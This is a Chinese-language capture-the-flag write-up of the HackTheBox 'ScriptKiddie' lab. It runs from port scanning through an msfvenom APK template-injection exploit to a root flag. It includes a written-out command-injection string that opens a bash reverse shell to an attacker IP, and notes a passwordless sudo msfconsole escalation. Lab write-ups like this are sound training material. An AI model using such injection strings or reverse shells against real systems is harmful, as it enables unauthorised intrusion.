HackTheBox—ScriptKiddi

文章源自【字节脉搏社区】-字节脉搏实验室

作者-Zone

在HTB里面看到了一些新的靶场，便开始了靶场之路

ScriptKiddie 难度4.1，感觉还行，开启环境，先访问下ip

拒绝访问，说明具有web站点，但80端口未开放，nmap扫描端口

开放了22，5000，8000，8888端口，但5000端口和8888端口打开是拒绝访问，所以从5000端口入手

工具集成的页面，nmap、msfvenom、searchsploit三款工具集成，先使用nmap ping127.0.0.1看下信息

两个端口22和5000，版本7.80，搜索一圈后没发现nmap7.80存在可利用漏洞，目光转向mfvenom，在exploit-db里找到一篇msfvenom apk模板注入，可以利用

因为有提供payload，下载之后保存到本地

运行payload会提示没有jarsigner命令，执行sudo apt-get install openjdk-11-jdk-headless，然后修改payload

这里注意ip，如果是虚拟机先下载openvpn(sudo apt-get openvpn) 在htb上下载配置文件，直接用openvpn打开就可以

查看下自己的ip，确认和靶机在同一个段，然后运行payload会生成一个evil.apk文件，在venom处上传apk文件，同时监听443端口

第二种方法：msf生成，在msf里搜索venom，调用第一个，设置好ip和端口，然后执行，在本地生成一个msf.apk，监听端口，上传，得到shell

相比较而言，第二种更稳定一点。得到shell之后切换到home目录可以看到存在kid和pwn两个用户，进入kid用户，可以看到user.txt，得到普通用户的flag

在pwn用户下看到存在scanlosers.sh文件，查看发现scanlosers.sh会一直扫描/home/kid/logs/hackers文件中的ip，但是该shell脚本未对hackers文件传入的内容做过滤，且/home/kid/logs/hackers文件当前用户kid可编辑

因此可以通过写入恶意代码“test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.2/8888 0>&1' #”，利用命令注入获得pwn用户的shell

得到pwn用户的shell，sudo -l发现不需要密码的sudo程序

sudo /opt/metasploit-framework-6.0.0/msfconsole

切换至root目录，查看

发现root.txt，查看该txt文件得到root用户的flag

提交，完事

注意事项：1、exp下载之后需要执行sudo apt-get install openjdk-11-jdk-headless命令

2、注意ip，确认主机和靶机在同一网段，如果是虚拟机，先下载openvpn，然后下载配置文件，使用openvpn打开即可

3、如果上传的时候nc无法反弹回shell，可以重置一下靶机，删除已经生成好的apk文件重新生成一个apk文件，在进行上传